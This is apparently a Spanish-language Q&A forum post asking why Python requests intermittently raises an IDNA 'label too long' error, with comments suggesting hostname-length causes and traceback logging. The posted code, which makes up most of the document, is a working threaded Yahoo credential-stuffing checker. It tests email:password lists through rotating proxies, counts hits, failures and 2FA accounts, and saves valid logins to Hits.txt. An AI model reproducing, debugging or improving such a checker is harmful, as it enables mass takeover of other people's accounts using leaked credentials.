# encoding with 'idna' codec failed (UnicodeError: label too long)

Tags: python-3.x, python-requests, python-3.9, urlencoding, encoding

Tengo un codigo que me logea en yahoo con python, usando la librería requests (Esta en un sistema de threading, por eso el while) y obtengo el siguiente error a veces (No el 100% de las veces)

```
encoding with 'idna' codec failed (UnicodeError: label too long)
```

y este es la funcion, no se exactamente donde ocurre el error ya que el programa esta programado para que me guarde los errores en un log.txt (En el except exception as e)y no los imprima para así no molestar. Bueno, espero que me puedan ayudar

```
def Yahoo(email, password, proxylist,retry, timeout):
    global hits, bads, free, checked, error, cpm
    sess = requests.Session()
    #PROXY = "11.456.448.110:8080"
    while True:
        if "yahoo" in email or "ymail" in email:
            try:
                threads, proxy_type, retrys, timeout, Limit, ProxyGrabber, ProxyLink=load_params()
                if proxy_type == "http":
                    scheme = "http"
                elif proxy_type == "socks4":
                    scheme = "socks4"
                elif proxy_type == "socks5":
                    scheme = "socks5"
                if not "null" in proxy_type:
                    proxy = random.choice(proxylist).replace(" ", "%20")
                    count = proxy.count(":")
                    proxy_form = {'http': f"{scheme}://{proxy}", 'https': f"{scheme}://{proxy}"}
                else:
                    pass
                US = urllib.parse.quote(email)
                PS = urllib.parse.quote(password)
                header = {
                "User-Agent": "Mozilla/5.0 (Linux; Android 10; vivo 1938 Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/91.0.4472.120 Mobile Safari/537.36"
                }
                url1 = "https://api.login.yahoo.com/oauth2/request_auth_fe?appid=com.yahoo.mobile.client.android.mail&appsrcv=6.32.1&src=androidphnx&srcv=8.15.0&intl=xa&language=en-EG&sdk-device-id=ODhjNTQyNzQzYTdkMGQzNmRiZWY5YTQzYjRhMDkxNzNiMjNmMzQyM2Zm&push=1&.asdk_embedded=1&theme=light&redirect_uri=https%3A%2F%2Fapi.login.yahoo.com%2FILokwdqHQAZzHkFZ%2Fcallback%2Fauth&client_id=ILokwdqHQAZzHkFZ&response_type=code&prompt=login&state=I0falo_JUh5wXg16U3HyxQ&scope=sdct-w%20mail-w%20sdpp-w%20yfin-w%20sports%20fspt-w%20openid%20device_sso&code_challenge=5yZbTpllpzJ2736u86Y3uKWg-JWs2pwqfXeP18uX83c&code_challenge_method=S256&nonce=ce32PksOQp4vNRULsFeOoFtsho447OHJ&webview=1"
                if not "null" in proxy_type:
                    r1 = sess.get(url1, headers=header, allow_redirects=False, proxies=proxy_form, timeout=int(timeout))
                else:
                    r1 = sess.get(url1, headers=header, allow_redirects=False, timeout=int(timeout))
                Y1 = r1.text[22:]
                if Y1 == "" or Y1 == " ":
                    continue
                if not "null" in proxy_type:
                    r2 = sess.get(Y1, headers=header, proxies=proxy_form, timeout=int(timeout))
                else:
                    r2 = sess.get(Y1, headers=header, timeout=int(timeout))
                r2c = sess.cookies.get_dict()

                YY = str(r2c)[str(r2c).find("{'AS': '")+len("{'AS': '"):str(r2c).rfind("', 'OA': '")]
                Y31 = r2.text[r2.text.find("name=\"crumb\" value=\"")+len("name=\"crumb\" value=\""):r2.text.rfind("\"")]
                Y3 = Y31[0:11]
                Y41 = r2.text[r2.text.find("name=\"acrumb\" value=\"")+len("name=\"acrumb\" value=\""):r2.text.rfind("\"")]
                Y4 = Y41[0:8] #8
                Y51 = r2.text[r2.text.find("name=\"sessionIndex\" value=\"")+len("name=\"sessionIndex\" value=\""):r2.text.rfind("\"")]
                Y5 = Y51[0:4] #4
                content = "acrumb="+Y4+"&crumb="+Y3+"&sessionIndex="+Y5+"&displayName=&deviceCapability=&username="+US+"&passwd=&signin=Next"

                header = {
                    "Content-Type":"application/x-www-form-urlencoded",
                    "Host": "login.yahoo.com",
                    "Connection": "keep-alive",
                    "User-Agent": "Mozilla/5.0 (Linux; Android 10; vivo 1938 Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/91.0.4472.120 Mobile Safari/537.36",
                    "X-Requested-With": "XMLHttpRequest",
                    "Accept": "*/*",
                    "Origin": "https://login.yahoo.com",
                    "Sec-Fetch-Site": "same-origin",
                    "Sec-Fetch-Mode": "cors",
                    "Sec-Fetch-Dest": "empty",
                    "Referer": "login.yahoo.com/",
                    "Accept-Language": "en-EG,en;q=0.9,en-US;q=0.8,en;q=0.7",
                    "Cookie": "AS=" + YY
                }
                if not "null" in proxy_type:
                    r3 = sess.post(Y1, headers=header, data=content, allow_redirects=False, proxies=proxy_form, timeout=int(timeout))
                else:
                    r3 = sess.post(Y1, headers=header, data=content, allow_redirects=False, timeout=int(timeout))
                if "location\":\"/account/challenge/password" in r3.text:
                    Y7 = r3.json().get('location')
                    content = "crumb="+Y3+"&acrumb="+Y4+"&sessionIndex="+Y5+"&displayName="+US+"&username="+US+"&passwordContext=normal&password="+PS+"&verifyPassword=Next"
                    url = "https://login.yahoo.com"+Y7
                    header = {
                    "Content-Type":"application/x-www-form-urlencoded",
                    "User-Agent": "Mozilla/5.0 (Linux; Android 10; vivo 1938 Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/91.0.4472.120 Mobile Safari/537.36",
                    "Pragma": "no-cache",
                    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
                    "Host": "login.yahoo.com",
                    "Connection": "keep-alive",
                    "Cache-Control": "max-age=0",
                    "Upgrade-Insecure-Requests": "1",
                    "Origin": "https://login.yahoo.com",
                    "X-Requested-With": "com.yahoo.mobile.client.android.mail",
                    "Sec-Fetch-Site": "same-origin",
                    "Sec-Fetch-Mode": "navigate",
                    "Sec-Fetch-User": "?1",
                    "Sec-Fetch-Dest": "document",
                    "Referer": "https://login.yahoo.com/",
                    "Accept-Language": "en-EG,en;q=0.9,en-US;q=0.8,en;q=0.7"
                    }
                    if not "null" in proxy_type:
                        r4 = sess.post(url, headers=header, data=content, allow_redirects=False, proxies=proxy_form, timeout=int(timeout))
                    else:
                        r4 = sess.post(url, headers=header, data=content, allow_redirects=False, timeout=int(timeout))
                    if "<p>Found. Redirecting to <a href=\"https://api.login.yahoo.com/oauth2/request_auth" in r4.text:
                        good = "\033[1;32;40m[+] " + email + ":" + password + "\033[1;37;40m"
                        print(good)
                        hits+=1
                        checked+=1
                        cpm+=1
                        good = email + ":" + password
                        open('results/Yahoo/{}/Hits.txt'.format(current_date), 'a+').write("{}\n".format(good))
                        break
                    elif "<p>Found. Redirecting to <a href=\"/account/challenge/password?done=" in r4.text or "INVALID_IDENTIFIER" in r4.text:
                        if str(retry) == str(retrys):
                            fail = "\033[1;31;40m[-] " + email + ":" + password + "\033[1;37;40m"
                            print(fail)
                            bads+=1
                            checked+=1
                            cpm+=1
                            break
                        else:
                            retry+=1
                            continue
                    elif "<p>Found. Redirecting to <a href=\"/account/challenge/challenge-selector" in r4.text:
                        custom = "\033[1;33;40m[*] " + email + ":" + password + "\033[1;37;40m"
                        print(custom)
                        free+=1
                        checked+=1
                        cpm+=1
                        custom = email + ":" + password
                        open('results/Yahoo/{}/2FA.txt'.format(current_date), 'a+').write("{}\n".format(custom))
                        break
                    elif "rate limited" in r4.text or "captcha" in r4.text:
                        error+=1
                        continue
                    else:
                        error+=1
                        continue
                elif "error\":\"messages.INVALID_USERNAME" in r3.text or "Sorry, we don't recognize this account" in r3.text or "/account/challenge/push" in r3.text or "/account/challenge/yak-code" in r3.text or "INVALID_IDENTIFIER" in r3.text or "/account/challenge/fail" in r3.text or "/saml2/atthaloc/request" in r3.text:
                    if str(retry) == str(retrys):
                        fail = "\033[1;31;40m[-] " + email + ":" + password + "\033[1;37;40m"
                        print(fail)
                        bads+=1
                        checked+=1
                        cpm+=1
                        break
                    else:
                        retry+=1
                        continue

                elif "location\":\"/account/challenge/recaptcha" in r3.text or "location\":\"/account/challenge/arkose" in r3.text:
                        error+=1
                        continue
                else:
                    error+=1
                    continue
            except Exception as e:
                """f = open("log.txt", "w")
                f.write(str(e))"""
                open("log.txt", 'a+').write("{}\n".format(e))
                #f.close()
                #print(e)
                error+=1
                continue
        else:
            break
```

bueno, espero que me puedan ayudar :D
Cualquier infomacion que necesiten me dicen, espero que me puedan ayudar, es urgente pls

Comment: Según leo [por aqui](https://stackoverflow.com/questions/51901399/python-requests-encoding-with-idna-codec-failed-unicodeerror-label-empty-o) parece que pudiera tratarse de un but relacionado con que el nombre de dominio en la URL tiene más de 64 caracteres. ¿Es posible que sea ese tu caso?

Comment: Quizás para diagnosticar mejor el problema deberías volcar al log el traceback completo de la excepción. Mira el módulo [traceback](https://docs.python.org/3/library/traceback.html) para hacerlo

Comment: @abulafia el problema es que no puedo poner una url mas corta, como puedo solucionarlo?P

Comment: Aunque es una [issue](https://bugs.python.org/issue32958) de python (que sigue sin resolverse), el problema es que la especificación DNS [prohibe nombres de host de más de 63 caracteres](https://datatracker.ietf.org/doc/html/rfc1035#section-2.3.1). El problema no es exactamente la longitud de la URL, sino la parte del nombre del host. ¿Has verificado que tu problema está ahí?  En ese caso ¿de dónde salen esos nombres tan largos? ¿Te los soporta el DNS?